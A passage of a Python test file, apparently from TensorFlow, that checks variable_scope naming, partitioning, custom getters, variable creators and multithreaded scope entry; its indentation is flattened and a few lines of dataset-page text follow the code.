@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetCollection(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
# All other sync values sets trainable=True
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
# take products of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertAllEqual(variable_names, ["forced_name"])
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creater_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])
class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.